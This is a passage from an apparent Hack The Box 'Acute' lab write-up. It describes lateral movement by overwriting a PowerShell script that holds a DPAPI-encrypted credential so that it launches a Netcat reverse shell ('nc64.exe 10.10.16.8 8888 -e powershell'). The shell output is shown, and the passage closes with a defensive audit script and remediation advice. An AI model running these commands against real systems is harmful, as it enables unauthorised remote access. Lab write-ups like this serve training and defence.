jmorgan


Upon gaining the initial foothold onto the ATSSERVER host as the imonks user via PowerShell's Invoke-Command cmdlet, I discovered a PowerShell script that executes an arbitrary remote command on the Acute-PC01 host as the jmorgan user. The embedded PSCredential object cannot be used directly, because the stored password is DPAPI-encrypted and the session is a restricted endpoint with access to only a limited set of PowerShell cmdlets. It can still be abused, however, because the current user, imonks, has write access to the PowerShell script that consumes it.

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {(Get-Content -Path C:\Users\imonks\Desktop\wm.ps1) -Replace 'Get-Volume', 'C:\Utils\nc64.exe 10.10.16.8 8888 -e powershell' | Set-Content -Path C:\Users\imonks\Desktop\wm.ps1}

Leveraging the Get-Content and Set-Content cmdlets, both of which are exposed by the restricted dc_manage endpoint, a string in a file can be replaced in place. The command above replaces the Get-Volume string with a Netcat reverse shell command.

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {cat C:\Users\imonks\Desktop\wm.ps1}
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {C:\Utils\nc64.exe 10.10.16.8 8888 -e powershell} -ComputerName Acute-PC01 -Credential $creds

Confirming the changes

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1}
 
The command completed successfully.

Executing the modified PowerShell script. Done.

┌──(kali㉿kali)-[~/archive/htb/labs/acute]
└─$ nnc 8888          
listening on [any] 8888 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 49855
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS C:\Users\jmorgan\Documents> whoami
whoami
acute\jmorgan
PS C:\Users\jmorgan\Documents> hostname
hostname
Acute-PC01
PS C:\Users\jmorgan\Documents> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet 2:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::9513:4361:23ec:64fd%14
   IPv4 Address. . . . . . . . . . . : 172.16.22.2
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.22.1

Lateral movement to the Acute-PC01 host as the jmorgan user, achieved by overwriting a PowerShell script that carries an embedded credential.
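The condition that makes this path possible is a script that rebuilds a PSCredential from a stored DPAPI blob, uses it for remoting, and sits in a location the lower-privileged account can write to. The PowerShell audit below is an added defensive example, not code from the original writeup: it walks a directory tree for .ps1 files that contain both a credential rebuild and an Invoke-Command -Credential call, then reports which principals outside a trusted list hold write rights on each file, together with a SHA256 that can serve as a baseline for change alerting. The function name Find-EmbeddedCredentialScript, the default $ScanRoot and the trusted principal list are assumptions; adjust them to the environment.

```powershell
# Added defensive example (not from the original writeup).
# Finds PowerShell scripts that rebuild a PSCredential from a stored string and use it
# with Invoke-Command, then reports which non-admin principals can modify those files.
# Assumptions: run locally on the host holding the scripts with permission to read
# the files and their ACLs; the function name, $ScanRoot and $TrustedPrincipals are placeholders.

function Find-EmbeddedCredentialScript {
    param(
        [string]$ScanRoot = 'C:\Users',   # placeholder root; point it at where operational scripts live
        [string[]]$TrustedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')
    )

    # Indicators that a credential is stored inline and later used for remoting.
    $credPatterns = @(
        'ConvertTo-SecureString',
        'New-Object\s+System\.Management\.Automation\.PSCredential',
        'Invoke-Command[^\r\n]*-Credential'
    )

    # Any of these rights lets the file body be rewritten.
    $writeRights = [int][System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

    Get-ChildItem -Path $ScanRoot -Filter *.ps1 -Recurse -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_
        $content = Get-Content -Path $file.FullName -Raw -ErrorAction SilentlyContinue
        if (-not $content) { return }   # unreadable or empty file: skip

        $hits = @($credPatterns | Where-Object { $content -match $_ })
        # Require both the credential rebuild and the remoting call before reporting.
        if ($hits.Count -lt 2) { return }

        # Allow ACEs granting write-capable rights to principals not in the trusted list.
        $writers = @(
            (Get-Acl -Path $file.FullName).Access |
            Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                (([int]$_.FileSystemRights -band $writeRights) -ne 0) -and
                ($TrustedPrincipals -notcontains $_.IdentityReference.Value)
            } |
            ForEach-Object { $_.IdentityReference.Value } |
            Sort-Object -Unique
        )

        $risk = 'MEDIUM: embedded credential'
        if ($writers.Count -gt 0) { $risk = 'HIGH: credential script writable by non-admin' }

        [pscustomobject]@{
            Path             = $file.FullName
            SHA256           = (Get-FileHash -Path $file.FullName -Algorithm SHA256).Hash
            Indicators       = ($hits -join '; ')
            UntrustedWriters = ($writers -join ', ')
            Risk             = $risk
        }
    }
}

# Usage: store the SHA256 values as a baseline; a changed hash or a new untrusted writer
# on a HIGH-risk entry is the signal that the script body or its ACL was altered.
Find-EmbeddedCredentialScript | Format-Table -AutoSize -Wrap
```

Run against a profile directory such as the one in the writeup, the script in question would surface with its owner listed under UntrustedWriters, which is exactly the combination to remove: either the credential leaves the script (a group managed service account or a scheduled task running as the target identity), or the file moves to a location the exposed account can read but not modify. Restricting Set-Content in the endpoint's role capability closes the specific write path used here but not the underlying design weakness.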